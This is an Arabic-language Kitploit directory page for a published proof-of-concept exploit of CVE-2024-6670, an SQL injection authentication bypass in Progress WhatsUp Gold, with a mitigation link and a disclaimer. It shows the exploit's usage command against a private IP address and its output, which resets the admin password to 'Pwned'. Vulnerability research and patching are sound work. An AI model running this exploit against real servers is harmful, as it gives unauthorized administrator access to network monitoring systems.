Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-6670 — إثبات مفهوم لاستغلال ثغرة حقن SQL لتجاوز المصادقة في Progress WhatsUp Gold (CVE-2024-6670). يتضمن تحليل السبب الجذري وإعادة تعيين كلمة المرور تلقائيًا للحصول على وصول المسؤول. | Kitploit
أدوات/GitHubGitHub/sinsinology/cve-2024-6670
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubsinsinology/cve-2024-6670

CVE-2024-6670

إثبات مفهوم لاستغلال ثغرة حقن SQL لتجاوز المصادقة في Progress WhatsUp Gold (CVE-2024-6670). يتضمن تحليل السبب الجذري وإعادة تعيين كلمة المرور تلقائيًا للحصول على وصول المسؤول.

عرض المستودع
3553منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-6670

إثبات مفهوم (PoC) لثغرة تجاوز المصادقة عبر حقن SQL في Progress Software WhatsUp Gold HasErrors (CVE-2024-6670)

يمكن العثور على تحليل السبب الجذري للثغرة في مدونتي:

https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/

ZDI

الاستخدام

root@kitploit:~
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046

        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/


[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned





إجراءات التخفيف

قم بالتحديث إلى أحدث إصدار أو خفّف المخاطر باتباع التعليمات الواردة في نشرة Progress الاستشارية

  • https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024

Manish Kishan Tanwar

لولا التحفيز والدروس التي علّمني إياها صديقي العزيز Manish على مر السنين التي عرفته فيها، لما استطعت استغلال هذه الثغرة، شكرًا لك يا صديقي.

تابعونا على تويتر (X) لأحدث الأبحاث الأمنية:

  • SinSinology
  • SummoningTeam

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في الحالات المصرّح بها صراحةً. القائمون على المشروع غير مسؤولين أو غير ملزمين قانونيًا عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة